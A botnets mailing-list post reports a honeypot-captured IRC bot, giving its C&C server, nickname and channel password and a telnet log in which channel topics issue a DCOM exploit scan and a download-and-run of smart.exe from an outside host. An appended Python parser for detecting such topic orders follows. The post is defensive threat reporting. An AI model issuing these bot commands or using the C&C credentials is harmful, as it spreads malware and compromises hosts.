To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
Hi,
today we received lsass.exe (cc95b4224748a4886daa78487a40b8ed) on our
honeypot. According to norman.com it connects to the following botnet:
[ Network services ]
* Looks for an Internet connection.
* Connects to "online.ircstyle.net" on port 6667 (TCP).
* Connects to IRC server.
* IRC: Uses nickname GurL80340024.
* IRC: Uses username ezkieyacag.
* IRC: Joins channel ##rrxx with password li.
* IRC: Sets the usermode for user GurL80340024 to -x+B.
## joining the party with telnet (BitchX was blocked)
telnet online.ircstyle.net 6667
Trying 80.195.235.18...
Connected to online.ircstyle.net.
Escape character is '^]'.
user ezkieyacag hub.57614.com hub.57614.com :Dont
nick GurL80340024
:hub.57614.com 001 GurL80340024 :GurL, [EMAIL PROTECTED]
:hub.57614.com 005 GurL80340024 MAP KNOCK SAFELIST HCN MAXCHANNELS=8
MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=15
AWAYLEN=307 :are supported by this server
:hub.57614.com 005 GurL80340024 WALLCHOPS WATCH=128 SILENCE=15
MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+
CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=GurL
CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server
:GurL80340024 MODE GurL80340024 :+iRp
join ##rrxx li
:[EMAIL PROTECTED] JOIN :##rrxx
:hub.57614.com 332 GurL80340024 ##rrxx :;raw join ##lscan,##lmon
:hub.57614.com 333 GurL80340024 ##rrxx always 1141759867
:hub.57614.com 353 GurL80340024 @ ##rrxx :GurL80340024
:hub.57614.com 366 GurL80340024 ##rrxx :End of /NAMES list.
mode GurL80340024 to -x+B
join ##lscan
:[EMAIL PROTECTED] JOIN :##lscan
:hub.57614.com 332 GurL80340024 ##lscan :;advscan dcom135 150 5 0 -r -s
:hub.57614.com 333 GurL80340024 ##lscan always 1141759856
:hub.57614.com 353 GurL80340024 @ ##lscan :GurL80340024
:hub.57614.com 366 GurL80340024 ##lscan :End of /NAMES list.
join ##lmon
:[EMAIL PROTECTED] JOIN :##lmon
:hub.57614.com 332 GurL80340024 ##lmon :;download http://www.darkblueroom.com/smart.exe c:\smart.exe 1 -s
:hub.57614.com 333 GurL80340024 ##lmon always 1141759839
:hub.57614.com 353 GurL80340024 @ ##lmon :GurL80340024
:hub.57614.com 366 GurL80340024 ##lmon :End of /NAMES list.
## strings of smart.exe:
strings smart.exe
Project1
Form1
Form1
Form1
VB5!
Project1
Project1
Project1
Project1
Form1
Y":O
Form
c:\program files\microsoft visual studio\vb98\VB6.OLB
wininet.dll
InternetOpenA
InternetOpenUrlA
InternetReadFile
InternetCloseHandle
Download
VBA6.DLL
...
No ISP has been notified yet.
cheers
andrej
_______________________________________________
botnets mailing list
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
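The session above shows the usual IRC C&C pattern: the bot joins a channel and obeys whatever the channel topic says (the 332 replies carrying `;raw join`, `;advscan` and `;download`). As an added example, not code from the post or its author, here is a small defender-side parser that walks raw IRC server lines and flags topics that read like bot orders; the sample lines are constructed to mirror the post, with a placeholder server name and download URL, and the verb list is an assumption.

```python
# Added example (not from the post): flag bot orders carried in IRC channel topics,
# the C&C pattern shown in the session (RPL_TOPIC 332 lines like ';raw join ...',
# ';advscan ...', ';download ...'). Sample lines mirror the post; host and URL are placeholders.

BOT_VERBS = {"advscan", "download", "raw", "update", "ddos", "scan"}  # from the post plus typical ones (assumed)
CMD_PREFIXES = ";!."  # command prefixes commonly used by IRC bots (assumed)

def parse_irc_line(line):
    """Split '[:prefix] CMD params... [:trailing]' into (prefix, cmd, params, trailing)."""
    line = line.rstrip("\r\n")
    prefix, _, line = line[1:].partition(" ") if line.startswith(":") else (None, "", line)
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    return (prefix, parts[0].upper(), parts[1:], trailing if sep else None) if parts else None

def extract_topic_commands(lines):
    """Return (channel, verb, args) for every 332/TOPIC whose text reads like a bot order."""
    found = []
    for line in lines:
        parsed = parse_irc_line(line)
        if parsed is None:
            continue
        _, cmd, params, trailing = parsed
        if cmd == "332" and len(params) >= 2:   # RPL_TOPIC <nick> <channel> :<topic>
            channel = params[1]
        elif cmd == "TOPIC" and params:         # live topic change
            channel = params[0]
        else:
            continue
        topic = (trailing or "").strip()
        tokens = topic[1:].split() if topic and topic[0] in CMD_PREFIXES else []
        if tokens and tokens[0].lower() in BOT_VERBS:
            found.append((channel, tokens[0].lower(), tokens[1:]))
    return found

def channels_to_follow(commands):
    """Channels named by ';raw join a,b' orders: where the bot will fetch its next orders."""
    chans = []
    for _, verb, args in commands:
        if verb == "raw" and len(args) >= 2 and args[0].lower() == "join":
            chans.extend(args[1].split(","))
    return chans

# Constructed sample session mirroring the post (placeholder host and URL)
SAMPLE_LINES = [
    ":irc.example.invalid 332 GurL80340024 ##rrxx :;raw join ##lscan,##lmon",
    ":irc.example.invalid 332 GurL80340024 ##lscan :;advscan dcom135 150 5 0 -r -s",
    ":irc.example.invalid 332 GurL80340024 ##lmon :;download http://example.invalid/smart.exe c:\\smart.exe 1 -s",
    ":irc.example.invalid 332 GurL80340024 #chat :Welcome, be nice",
]
```

Feeding `extract_topic_commands(SAMPLE_LINES)` the captured lines yields the three orders and `channels_to_follow` returns `##lscan` and `##lmon`, the channels a sensor should keep watching.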